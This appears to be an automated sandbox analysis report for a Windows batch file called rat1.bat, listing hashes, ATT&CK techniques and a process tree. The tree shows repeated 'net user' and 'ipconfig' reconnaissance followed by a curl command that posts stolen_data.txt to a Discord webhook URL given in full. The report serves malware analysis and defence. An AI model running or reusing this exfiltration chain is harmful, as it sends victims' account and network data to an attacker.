4b06a322f773fecc76acfed68351ec156981293c3a33e68cb0417391789ef768

Analysis

max time kernel
144s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
11/05/2024, 05:31

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

rat1.bat
Size

557B
MD5

481d06db1eb5bcfb9c42ac2f3a0fd608
SHA1

eff3383e917012c6c6bbab543bf09a73b49c27a5
SHA256

4b06a322f773fecc76acfed68351ec156981293c3a33e68cb0417391789ef768
SHA512

74455c8a0b0ca7d8a6907e9c1caccd3d750f83461dd19dbc5751701e42fdefbb3ec97c5b058604ad388565ae6267680886e7babc1f9afa24e487fdf174ea9fc0

Score

6^/10

Malware Config

Signatures

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
1	discord.com
2	discord.com
62	discord.com
78	discord.com

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
4364	timeout.exe
3648	timeout.exe
4972	timeout.exe

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
4628	ipconfig.exe
2152	ipconfig.exe
1948	ipconfig.exe

Runs net.exe

Suspicious use of WriteProcessMemory 42 IoCs

description	pid	Process	procid_target
PID 4412 wrote to memory of 3768	4412	cmd.exe	94
PID 4412 wrote to memory of 3768	4412	cmd.exe	94
PID 3768 wrote to memory of 1464	3768	cmd.exe	95
PID 3768 wrote to memory of 1464	3768	cmd.exe	95
PID 1464 wrote to memory of 4992	1464	net.exe	96
PID 1464 wrote to memory of 4992	1464	net.exe	96
PID 4412 wrote to memory of 2152	4412	cmd.exe	97
PID 4412 wrote to memory of 2152	4412	cmd.exe	97
PID 2152 wrote to memory of 4628	2152	cmd.exe	98
PID 2152 wrote to memory of 4628	2152	cmd.exe	98
PID 4412 wrote to memory of 1348	4412	cmd.exe	99
PID 4412 wrote to memory of 1348	4412	cmd.exe	99
PID 4412 wrote to memory of 4364	4412	cmd.exe	100
PID 4412 wrote to memory of 4364	4412	cmd.exe	100
PID 4412 wrote to memory of 3012	4412	cmd.exe	111
PID 4412 wrote to memory of 3012	4412	cmd.exe	111
PID 3012 wrote to memory of 4588	3012	cmd.exe	112
PID 3012 wrote to memory of 4588	3012	cmd.exe	112
PID 4588 wrote to memory of 3768	4588	net.exe	113
PID 4588 wrote to memory of 3768	4588	net.exe	113
PID 4412 wrote to memory of 2644	4412	cmd.exe	114
PID 4412 wrote to memory of 2644	4412	cmd.exe	114
PID 2644 wrote to memory of 2152	2644	cmd.exe	115
PID 2644 wrote to memory of 2152	2644	cmd.exe	115
PID 4412 wrote to memory of 1752	4412	cmd.exe	116
PID 4412 wrote to memory of 1752	4412	cmd.exe	116
PID 4412 wrote to memory of 3648	4412	cmd.exe	117
PID 4412 wrote to memory of 3648	4412	cmd.exe	117
PID 4412 wrote to memory of 2932	4412	cmd.exe	118
PID 4412 wrote to memory of 2932	4412	cmd.exe	118
PID 2932 wrote to memory of 2812	2932	cmd.exe	119
PID 2932 wrote to memory of 2812	2932	cmd.exe	119
PID 2812 wrote to memory of 3680	2812	net.exe	120
PID 2812 wrote to memory of 3680	2812	net.exe	120
PID 4412 wrote to memory of 1576	4412	cmd.exe	121
PID 4412 wrote to memory of 1576	4412	cmd.exe	121
PID 1576 wrote to memory of 1948	1576	cmd.exe	122
PID 1576 wrote to memory of 1948	1576	cmd.exe	122
PID 4412 wrote to memory of 4872	4412	cmd.exe	123
PID 4412 wrote to memory of 4872	4412	cmd.exe	123
PID 4412 wrote to memory of 4972	4412	cmd.exe	124
PID 4412 wrote to memory of 4972	4412	cmd.exe	124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rat1.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4412
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net user
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3768
- - C:\Windows\system32\net.exe
    net user
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1464
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user
      4⤵
      PID:4992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ipconfig
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2152
- - C:\Windows\system32\ipconfig.exe
    ipconfig
    3⤵
    - Gathers network information
    PID:4628
- C:\Windows\system32\curl.exe
  curl -H "Content-Type: application/json" -d "@stolen_data.txt" https://discord.com/api/webhooks/1238632306185343067/XHLKrXcegYQXvujtm7q3tiTAy70HisyrlWaPoyfCNygUAOK58q5eg9Y0WvTDDXpQQ6wZ
  2⤵
  PID:1348
- C:\Windows\system32\timeout.exe
  timeout /t 60
  2⤵
  - Delays execution with timeout.exe
  PID:4364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net user
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3012
- - C:\Windows\system32\net.exe
    net user
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4588
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user
      4⤵
      PID:3768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ipconfig
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2644
- - C:\Windows\system32\ipconfig.exe
    ipconfig
    3⤵
    - Gathers network information
    PID:2152
- C:\Windows\system32\curl.exe
  curl -H "Content-Type: application/json" -d "@stolen_data.txt" https://discord.com/api/webhooks/1238632306185343067/XHLKrXcegYQXvujtm7q3tiTAy70HisyrlWaPoyfCNygUAOK58q5eg9Y0WvTDDXpQQ6wZ
  2⤵
  PID:1752
- C:\Windows\system32\timeout.exe
  timeout /t 60
  2⤵
  - Delays execution with timeout.exe
  PID:3648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net user
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2932
- - C:\Windows\system32\net.exe
    net user
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2812
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user
      4⤵
      PID:3680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ipconfig
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1576
- - C:\Windows\system32\ipconfig.exe
    ipconfig
    3⤵
    - Gathers network information
    PID:1948
- C:\Windows\system32\curl.exe
  curl -H "Content-Type: application/json" -d "@stolen_data.txt" https://discord.com/api/webhooks/1238632306185343067/XHLKrXcegYQXvujtm7q3tiTAy70HisyrlWaPoyfCNygUAOK58q5eg9Y0WvTDDXpQQ6wZ
  2⤵
  PID:4872
- C:\Windows\system32\timeout.exe
  timeout /t 60
  2⤵
  - Delays execution with timeout.exe
  PID:4972

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4044 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:8
1⤵
PID:2652

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\stolen_data.txt

Filesize
652B

MD5
a79ec3df85ded11cbc565d84198ffb77

SHA1
56c2452c0a6704b4209d3fa7e863c88ffa9b9e13

SHA256
b857c7db5e4cadf4077643830151723a123ae1f0bfc45071ba01125690efb694

SHA512
b3c1e11915bc7307aecdd44d8b6731a59f77521305147a374e28c05f14b61c2864c346fb3094dc6381204a22f1ca80e498b1add698f2fd7a1f7c64c84e17a87a

Download Submit
C:\Users\Admin\AppData\Local\Temp\stolen_data.txt

Filesize
1KB

MD5
6dd69a568f0cf30a7a9f0e0d0d09b3b5

SHA1
88203029c2041a8ebadc6a755f42003fb6935734

SHA256
d268313c086bf68ae8630f4fca293ea53496ce5d724dab901857c9818f9e8d9b

SHA512
c522f24be0b069a1b847ef5ac93e843c90b442e920161460ede742b343f86cc9074a55f3a0bc98b7dace0519d30fb0df58386951a2488d08692f889fda2aa658

Download Submit
C:\Users\Admin\AppData\Local\Temp\stolen_data.txt

Filesize
1KB

MD5
516d85bc59256e7a767a5d961c38a793

SHA1
5426b12b52ed84ca635e2db0555469073c01353d

SHA256
796a76096531b7a11d57f8526fc7367c02af7dafd623520a79b089c3fabf24d8

SHA512
5bfe286d5b3001d47bd41ad788d846bcf783383a83338b1321a1a56415cb82093dc7e162a9f52bc4ec20ea4a387562556abe2e7b8b263c8c0dee60f6d16f1760

Download Submit